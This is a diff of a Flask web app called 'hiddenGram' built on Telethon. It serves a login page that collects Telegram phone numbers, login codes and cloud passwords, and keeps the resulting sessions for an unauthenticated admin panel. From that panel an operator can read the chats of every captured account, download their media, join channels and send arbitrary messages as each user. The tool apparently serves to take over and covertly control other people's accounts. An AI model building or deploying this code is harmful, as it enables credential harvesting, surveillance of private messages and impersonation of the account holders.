+                statusDiv.textContent = 'Please enter recipient and message.';
+                return;
+            }
+            statusDiv.textContent = 'Sending message...';
+            try {
+                const response = await fetch(`/api/user/${userId}/send_arbitrary_message`, {
+                    method: 'POST',
+                    headers: { 'Content-Type': 'application/json' },
+                    body: JSON.stringify({ recipient_id: recipient, message: content })
+                });
+                const result = await response.json();
+                statusDiv.textContent = result.message;
+                if (result.success) {
+                    document.getElementById('sendMessageRecipient').value = '';
+                    document.getElementById('sendMessageContent').value = '';
+                    setTimeout(() => closeModal('sendMessageModal'), 1500);
+                } else {
+                    statusDiv.style.color = '#f44336';
+                }
+            } catch (error) {
+                statusDiv.textContent = `Error: ${error.message}`;
+                statusDiv.style.color = '#f44336';
             }
         }
+
     </script>
 </body>
 </html>
 '''
 
-CHAT_MESSAGES_TEMPLATE = '''
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Messages in {{ chat_title }}</title>
-    <style>
-        body { font-family: Arial, sans-serif; background: #1a1a1a; color: #fff; margin: 0; padding: 20px; }
-        .container { max-width: 800px; margin: auto; }
-        h1 { text-align: center; color: #00ff00; }
-        .message-list { background: #222; padding: 10px; max-height: 70vh; overflow-y: auto; border-radius: 3px; margin-top: 15px;}
-        .message-item { margin: 10px 0; padding: 8px; background: #3a3a3a; border-radius: 3px; }
-        .message-item strong { color: #00ff00; }
-        .message-meta { font-size: 0.8em; color: #bbb; margin-bottom: 5px; }
-        .message-text { white-space: pre-wrap; word-wrap: break-word; }
-        .media-link { display: block; margin-top: 5px; color: #00ffff; }
-        .back-button { margin-top: 20px; display: block; text-align: center; }
-    </style>
-</head>
-<body>
-    <div class="container">
-        <h1>Messages in "{{ chat_title }}"</h1>
-        <div class="message-list">
-            {% if messages %}
-                {% for msg in messages %}
-                <div class="message-item">
-                    <div class="message-meta">
-                        <strong>{{ msg.sender_name }}</strong> ({{ msg.date }})
-                    </div>
-                    {% if msg.text %}
-                        <div class="message-text">{{ msg.text }}</div>
-                    {% endif %}
-                    {% if msg.file_name %}
-                        <a class="media-link" href="/download/{{ msg.file_name }}" download>{{ msg.file_name }} ({{ msg.file_size }})</a>
-                    {% endif %}
-                    {% if not msg.text and not msg.file_name %}
-                        <div class="message-text"><i>(Unsupported media or empty message)</i></div>
-                    {% endif %}
-                </div>
-                {% endfor %}
-            {% else %}
-                <p>No messages found in this chat.</p>
-            {% endif %}
-        </div>
-        <div class="back-button">
-            <a href="/user/{{ user_id }}/manage">Back to Account Management</a>
-        </div>
-    </div>
-</body>
-</html>
-'''
+# --- Flask Routes ---
 
 @app.route('/')
 def index():
+    """Renders the login page for adding new accounts."""
+    return render_template_string(LOGIN_TEMPLATE)
+
+@app.route('/admin')
+def admin_panel():
+    """Renders the admin panel displaying all managed accounts."""
     with sqlite3.connect(DB_PATH) as conn:
         c = conn.cursor()
         c.execute('SELECT id, telegram_id, username, phone FROM users')
         users = c.fetchall()
-    return render_template_string(HTML_TEMPLATE, users=users)
+    return render_template_string(ADMIN_TEMPLATE, users=users)
 
-@app.route('/login', methods=['POST'])
-def login():
+@app.route('/api/login', methods=['POST'])
+def api_login():
+    """Handles the Telegram login process steps via AJAX."""
     data = request.json
     phone = data.get('phone')
     code = data.get('code')
@@ -354,8 +706,11 @@ def login():
     phone_code_hash = data.get('phone_code_hash')
     step = data.get('step')
     
+    if not phone:
+        return jsonify({'success': False, 'message': 'Phone number is required.'}), 400
+
     session_hash = hashlib.md5(phone.encode()).hexdigest()
-    session_file_path = f"{SESSION_DIR}/{session_hash}.session"
+    session_file_path = os.path.join(SESSION_DIR, f"{session_hash}.session")
 
     async def _login_async():
         client = TelegramClient(session_file_path, API_ID, API_HASH)
@@ -367,10 +722,11 @@ def login():
                     me = await client.get_me()
                     with sqlite3.connect(DB_PATH) as conn:
                         c = conn.cursor()
+                        # Use INSERT OR REPLACE to handle cases where phone is already in DB
                         c.execute('INSERT OR REPLACE INTO users (telegram_id, username, phone, session_file) VALUES (?, ?, ?, ?)',
                                   (str(me.id), me.username or '', phone, session_file_path))
                         conn.commit()
-                    result = {'success': True, 'message': 'Already logged in.'}
+                    result = {'success': True, 'message': 'Already logged in. Redirecting to admin panel.'}
                 else:
                     sent_code = await client.send_code_request(phone)
                     result = {'success': True, 'message': 'Code sent to your Telegram.', 'phone_code_hash': sent_code.phone_code_hash}
@@ -386,9 +742,11 @@ def login():
                         c.execute('INSERT OR REPLACE INTO users (telegram_id, username, phone, session_file) VALUES (?, ?, ?, ?)',
                                   (str(me.id), me.username or '', phone, session_file_path))
                         conn.commit()
-                    result = {'success': True, 'message': 'Logged in successfully.'}
+                    result = {'success': True, 'message': 'Logged in successfully. Redirecting to admin panel.'}
                 except SessionPasswordNeededError:
                     result = {'success': False, 'password_required': True, 'message': 'Cloud password required.'}
+                except FloodWaitError as e:
+                    result = {'success': False, 'message': f'Too many attempts. Please wait {e.seconds} seconds.'}
                 except Exception as e:
                     result = {'success': False, 'message': f'Error during code submission: {e}.'}
             elif step == 'password':
@@ -400,7 +758,9 @@ def login():
                         c.execute('INSERT OR REPLACE INTO users (telegram_id, username, phone, session_file) VALUES (?, ?, ?, ?)',
                                   (str(me.id), me.username or '', phone, session_file_path))
                         conn.commit()
-                    result = {'success': True, 'message': 'Logged in with cloud password.'}
+                    result = {'success': True, 'message': 'Logged in with cloud password. Redirecting to admin panel.'}
+                except FloodWaitError as e:
+                    result = {'success': False, 'message': f'Too many attempts. Please wait {e.seconds} seconds.'}
                 except Exception as e:
                     result = {'success': False, 'message': f'Error during password submission: {e}.'}
             else:
@@ -408,14 +768,15 @@ def login():
         except Exception as e:
             result = {'success': False, 'message': f'An unexpected error occurred: {e}.'}
         finally:
-            if client and client.is_connected():
+            if client.is_connected():
                 await client.disconnect()
         return result
 
     return jsonify(asyncio.run(_login_async()))
 
-@app.route('/user/<int:user_id>/manage')
-def manage_user_account(user_id):
+@app.route('/user/<int:user_id>/client')
+def user_client_view(user_id):
+    """Renders the main hiddenGram client interface for a specific user."""
     with sqlite3.connect(DB_PATH) as conn:
         c = conn.cursor()
         c.execute('SELECT id, telegram_id, username, phone, session_file FROM users WHERE id = ?', (user_id,))
@@ -429,115 +790,140 @@ def manage_user_account(user_id):
             'phone': user_data[3],
             'session_file': user_data[4]
         }
+    return render_template_string(USER_CLIENT_TEMPLATE, user=user_dict)
 
+@app.route('/api/user/<int:user_id>/chats')
+def api_get_user_chats(user_id):
+    """API endpoint to get a list of chats for a user."""
     async def _get_chats_async():
         client, error = await get_user_client(user_id)
         if error:
-            return None, error
+            return {'success': False, 'message': error}
 
         chats_info = []
         try:
             async for dialog in client.iter_dialogs():
                 chat_type = 'User'
-                participants = 'N/A'
                 if dialog.is_channel:
                     chat_type = 'Channel'
-                    if hasattr(dialog.entity, 'participants_count'):
-                        participants = dialog.entity.participants_count
                 elif dialog.is_group:
                     chat_type = 'Group'
-                    if hasattr(dialog.entity, 'participants_count'):
-                        participants = dialog.entity.participants_count
                 
+                # Exclude service notifications or empty chats if desired
+                if dialog.is_empty:
+                    continue
+
                 chats_info.append({
                     'id': dialog.id,
                     'title': dialog.title,
                     'type': chat_type,
-                    'participants': participants
+                    'unread_count': dialog.unread_count # Telethon provides this
                 })
+            return {'success': True, 'chats': chats_info}
         except Exception as e:
-            return None, str(e)
+            return {'success': False, 'message': str(e)}
         finally:
             if client and client.is_connected():
                 await client.disconnect()
-        return chats_info, None
-
-    chats, error = asyncio.run(_get_chats_async())
-    if error:
-        return f"Failed to load chats: {error}", 500
 
-    return render_template_string(USER_MANAGE_TEMPLATE, user=user_dict, chats=chats)
+    return jsonify(asyncio.run(_get_chats_async()))
 
-@app.route('/user/<int:user_id>/chat/<int:peer_id>/messages')
-def get_chat_messages(user_id, peer_id):
+@app.route('/api/user/<int:user_id>/chat/<int:peer_id>/messages')
+def api_get_chat_messages(user_id, peer_id):
+    """API endpoint to get messages from a specific chat."""
     async def _get_messages_async():
         client, error = await get_user_client(user_id)
         if error:
-            return None, None, error
+            return {'success': False, 'message': error}
 
-        messages = []
-        chat_title = "Unknown Chat"
+        messages_data = []
         try:
             entity = await client.get_entity(peer_id)
-            chat_title = getattr(entity, 'title', getattr(entity, 'username', str(entity.id)))
-
-            async for message in client.iter_messages(entity, reverse=True):
+            
+            # Fetch last 50 messages
+            async for message in client.iter_messages(entity, limit=50, reverse=False): # Get in chronological order
                 msg_data = {
                     'text': message.text,
-                    'date': str(message.date.strftime("%Y-%m-%d %H:%M:%S")),
-                    'sender_name': 'Unknown'
+                    'date': message.date.strftime("%Y-%m-%d %H:%M:%S"),
+                    'sender_name': 'Unknown',
+                    'is_outgoing': message.out # True if message was sent by this user
                 }
 
                 if message.sender:
-                    if message.sender.first_name:
+                    if isinstance(message.sender, User):
                         msg_data['sender_name'] = message.sender.first_name
                         if message.sender.last_name:
                             msg_data['sender_name'] += f" {message.sender.last_name}"
-                    elif message.sender.username:
-                        msg_data['sender_name'] = message.sender.username
-                    elif hasattr(message.sender, 'title'):
+                        if not msg_data['sender_name'] and message.sender.username:
+                            msg_data['sender_name'] = message.sender.username
+                    elif isinstance(message.sender, (Channel, Chat)):
                         msg_data['sender_name'] = message.sender.title
+                
+                # Fallback for sender if name is still empty (e.g., deleted account)
+                if not msg_data['sender_name']:
+                    msg_data['sender_name'] = f"ID: {message.sender_id}" if message.sender_id else "Unknown"
 
                 if message.media:
-                    try:
-                        file_info = await client.download_media(message, file=DOWNLOAD_DIR)
-                        if file_info:
-                            file_path = Path(file_info)
-                            msg_data['file_name'] = file_path.name
-                            msg_data['file_size'] = f"{(os.path.getsize(file_path) / (1024*1024)):.2f} MB" if os.path.exists(file_path) else "N/A"
-                    except Exception as e:
-                        msg_data['file_name'] = f"Error downloading file: {e}"
-                        msg_data['file_size'] = ""
-                messages.append(msg_data)
+                    if isinstance(message.media, (MessageMediaPhoto, MessageMediaDocument)):
+                        try:
+                            # Use a unique name for downloaded files to prevent conflicts
+                            file_ext = Path(message.file.name or '').suffix or ''
+                            unique_filename = f"{message.id}_{message.date.timestamp()}{file_ext}"
+                            download_path = os.path.join(DOWNLOAD_DIR, unique_filename)
+                            
+                            file_info = await client.download_media(message, file=download_path)
+                            if file_info:
+                                msg_data['file_name'] = Path(file_info).name
+                                msg_data['file_size'] = f"{(os.path.getsize(file_info) / (1024*1024)):.2f} MB" if os.path.exists(file_info) else "N/A"
+                            else:
+                                msg_data['file_name'] = "Download failed."
+                        except Exception as e:
+                            msg_data['file_name'] = f"Error downloading media: {e}"
+                            msg_data['file_size'] = ""
+                    elif isinstance(message.media, MessageMediaWebPage):
+                        msg_data['webpage_url'] = message.media.webpage.url
+                        msg_data['webpage_title'] = message.media.webpage.title
+                    elif isinstance(message.media, MessageMediaPoll):
+                        msg_data['poll_question'] = message.media.poll.question
+                    elif isinstance(message.media, MessageMediaGeo):
+                        msg_data['geo_coords'] = f"{message.media.geo.lat}, {message.media.geo.long}"
+                    elif isinstance(message.media, MessageMediaContact):
+                        msg_data['contact_name'] = f"{message.media.first_name} {message.media.last_name or ''}"
+                    elif isinstance(message.media, MessageMediaUnsupported):
+                        msg_data['unsupported_media'] = True
+                    else:
+                        msg_data['unsupported_media'] = True # General catch-all for other media types
+                
+                messages_data.append(msg_data)
         except Exception as e:
-            return None, None, str(e)
+            return {'success': False, 'message': str(e)}
         finally:
             if client and client.is_connected():
                 await client.disconnect()
-        return messages, chat_title, None
+        return {'success': True, 'messages': messages_data}
 
-    messages, chat_title, error = asyncio.run(_get_messages_async())
-    if error:
-        return f"Failed to load messages: {error}", 500
-    
-    return render_template_string(CHAT_MESSAGES_TEMPLATE, user_id=user_id, chat_title=chat_title, messages=messages)
+    return jsonify(asyncio.run(_get_messages_async()))
 
 @app.route('/download/<filename>')
 def download_file(filename):
+    """Allows downloading files from the downloads directory."""
     return send_from_directory(DOWNLOAD_DIR, filename)
 
-@app.route('/send_message/<int:user_id>', methods=['POST'])
-def send_message(user_id):
+@app.route('/api/user/<int:user_id>/chat/<int:peer_id>/send_message', methods=['POST'])
+def api_send_message_to_chat(user_id, peer_id):
+    """API endpoint to send a message to a specific selected chat."""
     data = request.json
-    chat_id_or_username = data.get('chat_id')
     message_content = data.get('message')
 
+    if not message_content:
+        return jsonify({'success': False, 'message': 'Message content cannot be empty.'}), 400
+
     async def _send_message_async():
         client, error = await get_user_client(user_id)
         if error:
             return {'success': False, 'message': error}
         try:
-            await client.send_message(chat_id_or_username, message_content)
+            await client.send_message(peer_id, message_content)
             return {'success': True, 'message': 'Message sent successfully.'}
         except Exception as e:
             return {'success': False, 'message': str(e)}
@@ -548,30 +934,38 @@ def send_message(user_id):
     result = asyncio.run(_send_message_async())
     return jsonify(result)
 
-@app.route('/join_chat/<int:user_id>', methods=['POST'])
-def join_chat(user_id):
+@app.route('/api/user/<int:user_id>/join_chat', methods=['POST'])
+def api_join_chat(user_id):
+    """API endpoint for a user to join a chat/channel by identifier or invite link."""
     data = request.json
     chat_identifier = data.get('chat_identifier')
 
+    if not chat_identifier:
+        return jsonify({'success': False, 'message': 'Chat identifier or invite link is required.'}), 400
+
     async def _join_chat_async():
         client, error = await get_user_client(user_id)
         if error:
             return {'success': False, 'message': error}
         try:
             if 't.me/joinchat/' in chat_identifier or 't.me/+' in chat_identifier:
+                # Extract invite hash: remove 't.me/joinchat/' or 't.me/+' and handle '+' in hash
                 invite_hash = chat_identifier.split('/')[-1]
                 if '+' in invite_hash:
                     invite_hash = invite_hash.replace('+', '')
                 await client(ImportChatInviteRequest(invite_hash))
             else:
+                # Try joining by username
                 if not chat_identifier.startswith('@') and not chat_identifier.isdigit():
                     chat_identifier = '@' + chat_identifier
                 await client(JoinChannelRequest(chat_identifier))
-            return {'success': True, 'message': f'Successfully joined chat: {chat_identifier}.'}
+            return {'success': True, 'message': f'Successfully joined chat/channel: {chat_identifier}.'}
         except FloodWaitError as e:
             return {'success': False, 'message': f'Too many requests. Please try again in {e.seconds} seconds.'}
         except UserNotParticipantError:
              return {'success': False, 'message': f'User is already a participant of {chat_identifier} or chat does not exist/is private.'}
+        except PeerFloodError:
+            return {'success': False, 'message': 'Account is sending too many messages. Try again later.'}
         except Exception as e:
             return {'success': False, 'message': f'Error joining chat {chat_identifier}: {e}.'}
         finally:
@@ -581,6 +975,42 @@ def join_chat(user_id):
     result = asyncio.run(_join_chat_async())
     return jsonify(result)
 
+@app.route('/api/user/<int:user_id>/send_arbitrary_message', methods=['POST'])
+def api_send_arbitrary_message(user_id):
+    """API endpoint to send a message to any recipient (username or ID) from a user account."""
+    data = request.json
+    recipient_id = data.get('recipient_id')
+    message_content = data.get('message')
+
+    if not recipient_id or not message_content:
+        return jsonify({'success': False, 'message': 'Recipient and message content are required.'}), 400
+
+    async def _send_arbitrary_message_async():
+        client, error = await get_user_client(user_id)
+        if error:
+            return {'success': False, 'message': error}
+        try:
+            # Resolve recipient if it's a username
+            if not str(recipient_id).isdigit() and not recipient_id.startswith('-'): # Not an ID or channel ID
+                entity = await client.get_entity(recipient_id)
+                recipient_id = entity.id # Use resolved ID for sending
+
+            await client.send_message(recipient_id, message_content)
+            return {'success': True, 'message': f'Message sent to {recipient_id} successfully.'}
+        except FloodWaitError as e:
+            return {'success': False, 'message': f'Too many requests. Please try again in {e.seconds} seconds.'}
+        except PeerFloodError:
+            return {'success': False, 'message': 'Account is sending too many messages. Try again later.'}
+        except Exception as e:
+            return {'success': False, 'message': f'Error sending message to {recipient_id}: {e}.'}
+        finally:
+            if client and client.is_connected():
+                await client.disconnect()
+
+    result = asyncio.run(_send_arbitrary_message_async())
+    return jsonify(result)
+
+
 if __name__ == '__main__':
     init_db()
-    app.run(host=HOST, port=PORT)
+    app.run(host=HOST, port=PORT, debug=True) # debug=True is good for development, set to False in production